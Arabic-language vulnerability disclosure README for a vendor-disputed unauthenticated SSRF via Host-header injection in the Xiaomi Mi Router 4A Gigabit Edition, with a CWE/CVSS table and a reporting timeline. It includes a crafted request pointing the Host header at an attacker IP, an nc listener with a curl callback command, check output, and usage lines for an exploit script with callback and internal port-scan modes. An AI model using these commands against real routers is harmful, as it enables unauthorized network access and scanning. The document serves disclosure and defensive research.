
SSRF غير موثَّق في راوتر Xiaomi Mi Router 4A Gigabit Edition (البرنامج الثابت 3.0.24) عبر حقن رأس المضيف — CVE-2026-26898
توجد ثغرة أمنية من نوع تزوير الطلب من الخادم (SSRF) في جهاز التوجيه Xiaomi Mi Router 4A Gigabit Edition. تفشل واجهة الويب الخاصة بجهاز التوجيه في التحقق من رأس HTTP Host، مما يسمح لمهاجم غير موثَّق بإجبار جهاز التوجيه على إجراء اتصالات TCP صادرة عشوائية.
| الحقل | القيمة |
|---|
| الجهاز | Xiaomi Mi Router 4A Gigabit Edition |
| البرنامج الثابت | 3.0.24 (دولي) |
| CVE | CVE-2026-26898 (متنازع عليه — انظر حالة الإفصاح أدناه) |
| CWE | CWE-918 (تزوير الطلب من الخادم) |
| CVSS 3.1 | 8.6 (عالي) — تقييم الباحث؛ البائع يطعن في شدة الخطورة |
الحالة: متنازع عليه من قبل البائع — لم يتم قبول هذا التقرير من قبل Xiaomi.
يُستخدم CVE-2026-26898 هنا لأغراض التتبع فقط؛ نظرًا لخلاف البائع، يجب التعامل معه كـ متنازع عليه / غير مؤكد، وليس مؤكدًا من البائع.
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| الملف | الوصف |
|---|---|
xiaomi_ssrf_exploit.py | استغلال كامل مع أوضاع متعددة |
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| التاريخ | الحدث |
|---|---|
| 2026-01-15 | اكتشاف الثغرة؛ تطوير إثبات المفهوم |
| 2026-01-16 | الإبلاغ إلى Xiaomi عبر HackerOne (#3513458) |
| 2026-01-23 | أغلقت Xiaomi التقرير كمعلومة إعلامية (مخاطر منخفضة، لن يتم الإصلاح) |
| 2026-06-03 | نشر إعلان عام (هذا المستودع) — متنازع عليه من البائع، غير مصحح |
هذا الاستغلال مقدم للأغراض التعليمية واختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace